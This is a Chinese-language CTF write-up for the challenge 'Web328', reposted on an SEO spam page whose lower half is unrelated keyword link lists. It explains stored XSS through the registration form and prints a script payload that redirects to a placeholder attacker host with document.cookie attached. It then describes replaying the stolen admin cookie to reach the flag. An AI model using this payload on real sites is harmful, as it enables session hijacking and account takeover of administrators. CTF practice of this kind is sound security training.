当前位置: 首页 > news >正文

黄村网站建设价格网站seo优化心得

黄村网站建设价格,网站seo优化心得,网站的底部导航怎么做,做网站怎么报价Web328 简单阅读一下页面。 是一个登录系统,存在一个用户管理数据库。 那么我们注册一个账号,在账号或者密码中植入HTML恶意代码,当管理员访问用户管理数据库页面时,就会触发我们的恶意代码。 思路 我们向数据库中写入盗取管理员…

Web328

简单阅读一下页面。
是一个登录系统,存在一个用户管理数据库。
那么我们注册一个账号,在账号或者密码中植入HTML恶意代码,当管理员访问用户管理数据库页面时,就会触发我们的恶意代码。

在这里插入图片描述

在这里插入图片描述

思路

我们向数据库中写入盗取管理员Cookie的恶意代码,然后利用管理员Cookie跳过账号密码验证,直接登录管理员界面即可。

在注册页面,把script、body、svg、img标签都试一下,看看哪个能成功获取到Cookie。
最后使用script标签成功了。
账号和密码都输入下面的payload:

<script>location.href="http://xx.xx.xx.xx/flag.php?cookie="+document.cookie</script>

然后在登录界面登录一下,就会发现自己服务器获取到了管理员的cookie

这时候我们访问用户管理界面并抓包,将自己的Cookie修改为管理员的Cookie,页面会显示 欢迎你,admin
但是此时下面的用户名和密码还没有出现。我们需要继续抓包,发现又会抓到一个关于下面内容的包,将这个包的Cookie也改为管理员Cookie,我们才能成功获取flag。
在这里插入图片描述得到flag。

这里的管理员cookie更换的频率挺快的,能不能登录有点看运气,不知道有没有更稳定的方法/

http://www.hrbkazy.com/news/25431.html

相关文章:

  • 网站导航怎么用ulli做颜色广告
  • 开封做网站推广seo赚钱方式
  • 威廉网站建设搜索引擎谷歌入口
  • 应用软件开发公司网络营销中的seo与sem
  • 山东网站制作北京网站建设运营
  • 服务器wordpress建站教程企业网站开发多少钱
  • 网站和服务器是什么济南网络营销外包
  • 网页传奇网站seo优化的主要任务包括
  • 卖域名出去客户犯法怎么办aso优化运营
  • 制作文字图片网站优化快速排名软件
  • 最好的设计公司杭州seo网站建设
  • 做网站可以用ai做国际新闻最新消息今天军事新闻
  • 清欢互联网网站建设武汉seo服务多少钱
  • 做网站图片怎么做站长之家seo概况查询
  • 技术支持 哈尔滨网站建设百度下载安装到手机
  • 怎样给自己的网站做优化互联网广告管理暂行办法
  • 网站的思维导图怎么做黄页网络的推广网站有哪些软件
  • 南京广告公司装修企业seo关键词优化
  • 河南高端网站建设韶关疫情最新消息
  • 上海网站建站最新的疫情数据
  • 个人网站论文结束语平台seo
  • 网站做程序员跨界营销案例
  • 如何创建div做网站网络营销网络推广
  • 用自己电脑做服务器 网站吗seo服务商技术好的公司
  • 网站空间怎么购买互联网营销师培训课程
  • 网站建站哪个公司好一点百度百度一下官网
  • 做资源网站盈利点推广联盟
  • 做介绍英文网站软文素材库
  • 网站模板 缓存商标网站优化方式有哪些
  • 怎么制作网站来赚钱下载百度网盘app